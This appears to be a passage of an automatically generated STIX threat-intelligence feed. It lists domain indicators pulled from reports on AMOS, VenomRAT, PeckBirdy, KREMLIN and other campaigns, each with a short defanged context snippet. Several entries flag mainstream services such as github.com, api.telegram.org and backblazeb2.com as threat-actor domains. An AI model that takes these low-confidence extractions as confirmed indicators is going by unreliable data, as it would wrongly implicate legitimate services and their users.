{"type":"bundle","id":"bundle--323fe880-6aed-406d-8fee-460286e4b6da","objects":[{"type":"identity","spec_version":"2.1","id":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","created":"2026-09-16T11:18:31.777Z","modified":"2026-09-16T11:18:31.777Z","name":"ZeroHour","identity_class":"system","description":"Indicators auto-extracted from public security reporting. Verify before use."},{"type":"indicator","spec_version":"2.1","id":"indicator--9d6f9d81-1d49-42c3-9baa-f9792154d640","created":"2026-09-16T10:00:11.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: github.com","description":"Seen in \"NightEagle targets Russian companies\" (Kaspersky Securelist). Context: s and archives were disguised to look legitimate: https : //github[.]com/mirror-js/mirror-js/refs/heads/main/js/js-webpack.zip htt","pattern":"[domain-name:value = 'github.com']","pattern_type":"stix","valid_from":"2026-09-16T10:00:11.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Kaspersky Securelist","url":"https://securelist.com/tr/nighteagle-apt-ghostcontainer-and-tunneling/121323/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--18aeb269-e66d-45f2-a427-c5de02abd3a2","created":"2026-09-16T10:00:06.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: ferncore13.com","description":"Seen in \"Atomic macOS (AMOS) Stealer Activity\" (Palo Alto Unit 42). Context: in Figure 2 retrieved a Z-shell (Zsh) script from hxxps[:]//ferncore13[.]com/curl/608e70d1338612686917ee5cd300ff7ed8e318dfd787a50257f9","pattern":"[domain-name:value = 'ferncore13.com']","pattern_type":"stix","valid_from":"2026-09-16T10:00:06.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/atomic-macos-amos-stealer-activity/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bc394899-ec7a-412b-9a06-9165f0adde4d","created":"2026-09-16T10:00:06.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: getmacouscloud.com","description":"Seen in \"Atomic macOS (AMOS) Stealer Activity\" (Palo Alto Unit 42). Context: ng to have installation instructions for a macOS toolkit is getmacouscloud[.]com . An example of one of the pages is shown below in Figure","pattern":"[domain-name:value = 'getmacouscloud.com']","pattern_type":"stix","valid_from":"2026-09-16T10:00:06.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/atomic-macos-amos-stealer-activity/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4849d62e-7f84-4028-87ba-4c0a54e29e19","created":"2026-09-16T10:00:06.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: grove-89.com","description":"Seen in \"Atomic macOS (AMOS) Stealer Activity\" (Palo Alto Unit 42). Context: m the payload returned from the initial download: hxxps[:]//grove-89[.]com/api/metrics/run?event=pasted hxxps[:]//ferncore13[.]com/2","pattern":"[domain-name:value = 'grove-89.com']","pattern_type":"stix","valid_from":"2026-09-16T10:00:06.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/atomic-macos-amos-stealer-activity/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7d526aa0-68ff-4998-b8ba-f9dcb10a9680","created":"2026-09-16T09:36:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 17dlz.cn","description":"Seen in \"PAPERMILL Malware Campaign Abuses Signed Notepad++ to Deliver VenomRAT to Windows Users\" (GBHackers). Context: [.]cc Sending IP 155.94.154.195 Sending MTA (HELO/PTR) mos1.17dlz[.]cn Bulk-mailer auth host smtp.smtpman[.]cn Note: IP addresse","pattern":"[domain-name:value = '17dlz.cn']","pattern_type":"stix","valid_from":"2026-09-16T09:36:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/papermill-malware-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bbe152b3-bec4-4ea0-acd6-a45423a7a92a","created":"2026-09-16T09:36:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: hsaui.cc","description":"Seen in \"PAPERMILL Malware Campaign Abuses Signed Notepad++ to Deliver VenomRAT to Windows Users\" (GBHackers). Context: promise Type Indicator Sender address / DKIM domain dfgfasd@hsaui[.]cc Sending IP 155.94.154.195 Sending MTA (HELO/PTR) mos1.17d","pattern":"[domain-name:value = 'hsaui.cc']","pattern_type":"stix","valid_from":"2026-09-16T09:36:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/papermill-malware-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c0fb2792-5570-4d01-9582-8267012acf16","created":"2026-09-16T09:36:34.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: smtpman.cn","description":"Seen in \"PAPERMILL Malware Campaign Abuses Signed Notepad++ to Deliver VenomRAT to Windows Users\" (GBHackers). Context: g MTA (HELO/PTR) mos1.17dlz[.]cn Bulk-mailer auth host smtp.smtpman[.]cn Note: IP addresses and domains are intentionally defanged","pattern":"[domain-name:value = 'smtpman.cn']","pattern_type":"stix","valid_from":"2026-09-16T09:36:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/papermill-malware-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--235fb6c5-9bad-4968-a96e-830ad60d566a","created":"2026-09-16T09:03:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 11170011.com","description":"Seen in \"China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites\" (GBHackers). Context: ity casino websites in this network. A recently active site 11170011[.]com featuring “Venetian Macao” branding, translated into Engl","pattern":"[domain-name:value = '11170011.com']","pattern_type":"stix","valid_from":"2026-09-16T09:03:36.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/peckbirdy-malware-c2/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fc426544-cced-4814-bcb3-121b4e1207e6","created":"2026-09-16T09:03:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: 80074.cc","description":"Seen in \"China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites\" (GBHackers). Context: Language Casino Domains (Type 1) 11170011[.]com puqxr[.]com 80074[.]cc PeckBirdy C2 and Decoy Domains (Type 3) vip311[.]cc Decoy","pattern":"[domain-name:value = '80074.cc']","pattern_type":"stix","valid_from":"2026-09-16T09:03:36.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/peckbirdy-malware-c2/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--689ff65a-c166-4bd6-a904-78a25a4ebd52","created":"2026-09-16T09:03:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: appcasino.online","description":"Seen in \"China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites\" (GBHackers). Context: Scambling Domains (Type 2) dollycasino[.]com dragobet[.]net appcasino[.]online Illegal Chinese-Language Casino Domains (Type 1) 11170011","pattern":"[domain-name:value = 'appcasino.online']","pattern_type":"stix","valid_from":"2026-09-16T09:03:36.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/peckbirdy-malware-c2/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c78ba60f-9111-4cbd-ad45-1623abf38602","created":"2026-09-16T09:03:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cache-cdn.org","description":"Seen in \"China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites\" (GBHackers). Context: ly three. A previously identified PeckBirdy-related domain, cache-cdn[.]org, had 13 detections illustrating how visibility drops as o","pattern":"[domain-name:value = 'cache-cdn.org']","pattern_type":"stix","valid_from":"2026-09-16T09:03:36.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/peckbirdy-malware-c2/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--09ee9498-dcab-4f17-a465-d87efb01b7b3","created":"2026-09-16T09:03:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cache-mcp.com","description":"Seen in \"China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites\" (GBHackers). Context: embedded JavaScript associated with the PeckBirdy C2 domain cache-mcp[.]com. The script registered a service worker and connected to","pattern":"[domain-name:value = 'cache-mcp.com']","pattern_type":"stix","valid_from":"2026-09-16T09:03:36.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/peckbirdy-malware-c2/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--97c71433-7395-49eb-b951-b8c226244375","created":"2026-09-16T09:03:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: dollycasino.com","description":"Seen in \"China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites\" (GBHackers). Context: l pattern. IOCs Category Domains Scambling Domains (Type 2) dollycasino[.]com dragobet[.]net appcasino[.]online Illegal Chinese-Languag","pattern":"[domain-name:value = 'dollycasino.com']","pattern_type":"stix","valid_from":"2026-09-16T09:03:36.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/peckbirdy-malware-c2/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e7fd23e7-5ec4-4062-83a8-0448e8d916f5","created":"2026-09-16T09:03:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: dragobet.net","description":"Seen in \"China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites\" (GBHackers). Context: y and unworthy of investigation. If you search this domain “dragobet[.]net” on Google it quickly becomes clear that someone ran a bl","pattern":"[domain-name:value = 'dragobet.net']","pattern_type":"stix","valid_from":"2026-09-16T09:03:36.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/peckbirdy-malware-c2/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--82e50976-0daf-4af0-8435-a55dd1f731d0","created":"2026-09-16T09:03:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: githubassets.net","description":"Seen in \"China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites\" (GBHackers). Context: is not automatically evidence of compromise. In particular, githubassets[.]net a PeckBirdy-associated typosquat can be reached through c","pattern":"[domain-name:value = 'githubassets.net']","pattern_type":"stix","valid_from":"2026-09-16T09:03:36.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/peckbirdy-malware-c2/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a3e35cb7-e1cb-446b-94cc-23366e8889b6","created":"2026-09-16T09:03:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: mcp-source.online","description":"Seen in \"China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites\" (GBHackers). Context: ervice worker and connected to another infrastructure node, mcp-source[.]online, through WebSocket communications. That layered design ma","pattern":"[domain-name:value = 'mcp-source.online']","pattern_type":"stix","valid_from":"2026-09-16T09:03:36.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/peckbirdy-malware-c2/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9a96fb7a-f72e-479f-ab3f-32d3c3ba5166","created":"2026-09-16T09:03:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: puqxr.com","description":"Seen in \"China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites\" (GBHackers). Context: gal Chinese-Language Casino Domains (Type 1) 11170011[.]com puqxr[.]com 80074[.]cc PeckBirdy C2 and Decoy Domains (Type 3) vip311","pattern":"[domain-name:value = 'puqxr.com']","pattern_type":"stix","valid_from":"2026-09-16T09:03:36.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/peckbirdy-malware-c2/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3748d782-f05d-4105-a6d2-5fd8004fbc88","created":"2026-09-16T09:03:36.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: vip311.cc","description":"Seen in \"China-Aligned Hackers Hide PeckBirdy Malware C2 Inside Casino and Adult Websites\" (GBHackers). Context: the threat actors have refined the camouflage. One example, vip311[.]cc, presented itself as a Chinese-language KY-branded casino","pattern":"[domain-name:value = 'vip311.cc']","pattern_type":"stix","valid_from":"2026-09-16T09:03:36.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/peckbirdy-malware-c2/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0f0365c7-fe8b-4aeb-ac62-3d488458830c","created":"2026-09-16T08:31:15.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: api.telegram.org","description":"Seen in \"Iranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware\" (Cyber Security News). Context: a space after Windows , used for additional payloads Domain api[.]telegram[.]org Telegram service domain that should be investigated whe","pattern":"[domain-name:value = 'api.telegram.org']","pattern_type":"stix","valid_from":"2026-09-16T08:31:15.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-mri-results/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--524e3c13-60cd-4956-8778-8b7e2ea2a341","created":"2026-09-16T08:31:15.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: backblazeb2.com","description":"Seen in \"Iranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware\" (Cyber Security News). Context: e domain that should be investigated when unexpected Domain backblazeb2[.]com Cloud-storage domain identified for investigation Domain","pattern":"[domain-name:value = 'backblazeb2.com']","pattern_type":"stix","valid_from":"2026-09-16T08:31:15.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-mri-results/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5acbaeac-4f74-424c-be1d-de1b841bb91d","created":"2026-09-16T08:31:15.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: iproyal.com","description":"Seen in \"Iranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware\" (Cyber Security News). Context: io Cloud-storage domain identified for investigation Domain iproyal[.]com Proxy-service domain identified for investigation Domain","pattern":"[domain-name:value = 'iproyal.com']","pattern_type":"stix","valid_from":"2026-09-16T08:31:15.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-mri-results/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--48c887de-9b28-4a36-a9aa-6ed2934f2a53","created":"2026-09-16T08:31:15.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lightningproxies.net","description":"Seen in \"Iranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware\" (Cyber Security News). Context: om Proxy-service domain identified for investigation Domain lightningproxies[.]net Proxy-service domain identified for investigation Note: I","pattern":"[domain-name:value = 'lightningproxies.net']","pattern_type":"stix","valid_from":"2026-09-16T08:31:15.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-mri-results/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d203c41-c992-49e7-99c4-74979456aebf","created":"2026-09-16T08:31:15.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: storjshare.io","description":"Seen in \"Iranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware\" (Cyber Security News). Context: d object-storage domain identified for investigation Domain storjshare[.]io Cloud-storage domain identified for investigation Domain","pattern":"[domain-name:value = 'storjshare.io']","pattern_type":"stix","valid_from":"2026-09-16T08:31:15.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-mri-results/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--10e98fb2-2144-4bde-9256-e45f8bf6b9be","created":"2026-09-16T08:31:15.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: vultrobjects.com","description":"Seen in \"Iranian Hackers Use Fake MRI Results to Infect Victims With CHOSEN BRICK Spyware\" (Cyber Security News). Context: om Cloud-storage domain identified for investigation Domain vultrobjects[.]com Cloud object-storage domain identified for investigation","pattern":"[domain-name:value = 'vultrobjects.com']","pattern_type":"stix","valid_from":"2026-09-16T08:31:15.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-mri-results/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a40a04cc-a5e2-4f2b-9daf-d5f6a9898aab","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: acrobat-updater.com","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: n[.]online Earlier campaign extension-hosting domain Domain acrobat-updater[.]com Earlier campaign lure and payload-hosting domain Domain l","pattern":"[domain-name:value = 'acrobat-updater.com']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f11d258c-e6e0-4ad3-8712-38b5a5ab72da","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: codecaudiog.site","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: rastructure associated with a related KREMLIN branch Domain codecaudiog[.]site Earlier KREMLIN campaign staging domain Domain codecvideo","pattern":"[domain-name:value = 'codecaudiog.site']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e38f6e06-4ad3-4284-88f6-c16faa7d335e","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: codecvideowin.online","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: udiog[.]site Earlier KREMLIN campaign staging domain Domain codecvideowin[.]online Earlier campaign extension-hosting domain Domain acrobat-","pattern":"[domain-name:value = 'codecvideowin.online']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--634bd473-4d18-421d-ba24-87960c8c4b43","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: connection.upgradeonline.site","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: 51a9b9 PowerShell extension-installer implementation Domain connection[.]upgradeonline[.]site Loader beaconing and extension-delivery infrastructure","pattern":"[domain-name:value = 'connection.upgradeonline.site']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1390f3b2-30ee-46fc-925e-0ba9c55c3cda","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cremeb.com","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: itily[.]workers[.]dev FrameSync campaign C2 resolver Domain cremeb[.]com QR-extension and earlier KREMLIN campaign infrastructure","pattern":"[domain-name:value = 'cremeb.com']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--862a5805-5fad-4543-ac4f-f74f612d8ec8","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: donalurdesconfeitos.site","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: xtension and earlier KREMLIN campaign infrastructure Domain donalurdesconfeitos[.]site Earlier extension-delivery infrastructure Domain marialur","pattern":"[domain-name:value = 'donalurdesconfeitos.site']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e5802544-29f0-470e-9434-ce6397c37245","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: granderevolucao.store","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: yfans[.]net Network canary domain checked by KREMLIN Domain granderevolucao[.]store Installer payload-hosting domain Domain volmira[.]site Ex","pattern":"[domain-name:value = 'granderevolucao.store']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7f142f73-3f1a-4b87-852f-57924846ce31","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: graph.checkeligibitily.workers.dev","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: nline Exfiltration and fingerprinting infrastructure Domain graph[.]checkeligibitily[.]workers[.]dev Extension endpoint resolver Domain luizestrelhashapr[","pattern":"[domain-name:value = 'graph.checkeligibitily.workers.dev']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a040d3dd-3345-4a91-bbf3-1bcb74f1721c","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: harialurdes.site","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: ialurdes[.]site Intermediate KREMLIN campaign domain Domain harialurdes[.]site Intermediate KREMLIN campaign domain IP address 178.92.16","pattern":"[domain-name:value = 'harialurdes.site']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9d30c1fe-c697-4c43-a154-8e6fafed5207","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: lojinhadoluiz.online","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: com Earlier campaign lure and payload-hosting domain Domain lojinhadoluiz[.]online FrameSync campaign extension infrastructure Domain orange","pattern":"[domain-name:value = 'lojinhadoluiz.online']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--221924d6-5dfe-42b6-bbe7-1d4438799f00","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: luizestrelhashapr.online","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: gibitily[.]workers[.]dev Extension endpoint resolver Domain luizestrelhashapr[.]online Resolved WebSocket command-and-control host Domain segura","pattern":"[domain-name:value = 'luizestrelhashapr.online']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--07abcabc-fdbc-4dbb-9736-5ed098dce850","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: marialurdes.site","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: tos[.]site Earlier extension-delivery infrastructure Domain marialurdes[.]site Intermediate KREMLIN campaign domain Domain harialurdes[.","pattern":"[domain-name:value = 'marialurdes.site']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/kremlin-banking-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--75be5b5c-5efa-40a6-8305-cbab0225b196","created":"2026-09-16T08:12:32.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: orange-sun-195a.checkeligibitily.workers.dev","description":"Seen in \"KREMLIN Banking Malware Infects Over 1,500 Systems With Malicious Chrome Extension\" (Cyber Security News). Context: .]online FrameSync campaign extension infrastructure Domain orange-sun-195a[.]checkeligibitily[.]workers[.]dev FrameSync campaign C2 resolver Domain cremeb[.]com QR","pattern":"[domain-name:value = 'orange-sun-195a.checkeligibitily.workers.dev']","pattern_type":"stix","valid_from":"2026-09-16T08:12:32.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security 